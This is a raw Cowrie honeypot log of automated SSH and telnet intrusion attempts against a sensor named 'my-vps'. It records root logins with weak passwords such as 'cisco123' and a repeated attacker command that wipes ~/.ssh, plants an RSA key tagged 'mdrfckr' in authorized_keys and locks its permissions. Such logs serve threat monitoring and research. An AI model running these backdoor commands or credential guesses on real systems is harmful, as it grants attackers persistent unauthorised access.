{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.076231Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:40:35.098594Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.099427Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.178871Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.179874Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.262508Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.263489Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":41914,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cea89adbd6b","protocol":"ssh","message":"New connection: 45.159.112.103:41914 (1.2.3.4:22) [session: 9cea89adbd6b]","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.304002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.309726Z","src_ip":"45.159.112.103","session":"9cea89adbd6b"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":34248,"dst_ip":"1.2.3.4","dst_port":22,"session":"34ec9dcbfaa5","protocol":"ssh","message":"New connection: 24.108.102.132:34248 (1.2.3.4:22) [session: 34ec9dcbfaa5]","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.413016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.418306Z","src_ip":"24.108.102.132","session":"34ec9dcbfaa5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.425073Z","src_ip":"45.159.112.103","session":"9cea89adbd6b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.581587Z","src_ip":"24.108.102.132","session":"34ec9dcbfaa5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:40:35.888165Z","src_ip":"45.159.112.103","session":"9cea89adbd6b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:40:36.240792Z","src_ip":"24.108.102.132","session":"34ec9dcbfaa5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.006552Z","src_ip":"45.159.112.103","session":"9cea89adbd6b"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":41916,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8b2588ff928","protocol":"ssh","message":"New connection: 45.159.112.103:41916 (1.2.3.4:22) [session: f8b2588ff928]","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.103290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.104236Z","src_ip":"45.159.112.103","session":"f8b2588ff928"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.207666Z","src_ip":"45.159.112.103","session":"f8b2588ff928"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.407898Z","src_ip":"24.108.102.132","session":"34ec9dcbfaa5"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":34264,"dst_ip":"1.2.3.4","dst_port":22,"session":"c87e6d925b83","protocol":"ssh","message":"New connection: 24.108.102.132:34264 (1.2.3.4:22) [session: c87e6d925b83]","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.579839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.590700Z","src_ip":"24.108.102.132","session":"c87e6d925b83"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.663972Z","src_ip":"45.159.112.103","session":"f8b2588ff928"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.766264Z","src_ip":"45.159.112.103","session":"fb8643aab3b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.769261Z","src_ip":"24.108.102.132","session":"c87e6d925b83"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:37.770581Z","src_ip":"45.159.112.103","session":"f8b2588ff928"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:40:38.467376Z","src_ip":"24.108.102.132","session":"c87e6d925b83"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:38.631351Z","src_ip":"24.108.102.132","session":"c160c6df8487"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:38.646038Z","src_ip":"24.108.102.132","session":"c87e6d925b83"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:40:58.883980Z","src_ip":"212.227.235.229","session":"0a15394bd279"}
{"eventid":"cowrie.session.connect","src_ip":"125.67.215.190","src_port":60910,"dst_ip":"1.2.3.4","dst_port":23,"session":"c4b162d8f3bf","protocol":"telnet","message":"New connection: 125.67.215.190:60910 (1.2.3.4:23) [session: c4b162d8f3bf]","sensor":"my-vps","timestamp":"2025-08-26T00:41:00.419842Z"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":41928,"dst_ip":"1.2.3.4","dst_port":22,"session":"48d58e290dcc","protocol":"ssh","message":"New connection: 36.89.28.139:41928 (1.2.3.4:22) [session: 48d58e290dcc]","sensor":"my-vps","timestamp":"2025-08-26T00:41:27.732157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:27.733376Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:27.915828Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.login.success","username":"root","password":"cisco123","message":"login attempt [root/cisco123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:41:28.689306Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:41:29.074514Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:41:29.075598Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:41:29.076686Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:29.260337Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:41:29.724102Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:41:29.724817Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:41:29.909127Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:29.909966Z","src_ip":"36.89.28.139","session":"48d58e290dcc"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":41940,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e46dda1fbd5","protocol":"ssh","message":"New connection: 36.89.28.139:41940 (1.2.3.4:22) [session: 5e46dda1fbd5]","sensor":"my-vps","timestamp":"2025-08-26T00:41:30.116207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:30.116801Z","src_ip":"36.89.28.139","session":"5e46dda1fbd5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:30.315107Z","src_ip":"36.89.28.139","session":"5e46dda1fbd5"}
{"eventid":"cowrie.session.closed","duration":30.41018557548523,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:30.829938Z","src_ip":"125.67.215.190","session":"c4b162d8f3bf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:41:31.151683Z","src_ip":"36.89.28.139","session":"5e46dda1fbd5"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:32.352763Z","src_ip":"36.89.28.139","session":"5e46dda1fbd5"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":41950,"dst_ip":"1.2.3.4","dst_port":22,"session":"1870c0f61d07","protocol":"ssh","message":"New connection: 36.89.28.139:41950 (1.2.3.4:22) [session: 1870c0f61d07]","sensor":"my-vps","timestamp":"2025-08-26T00:41:32.528928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:32.529708Z","src_ip":"36.89.28.139","session":"1870c0f61d07"}
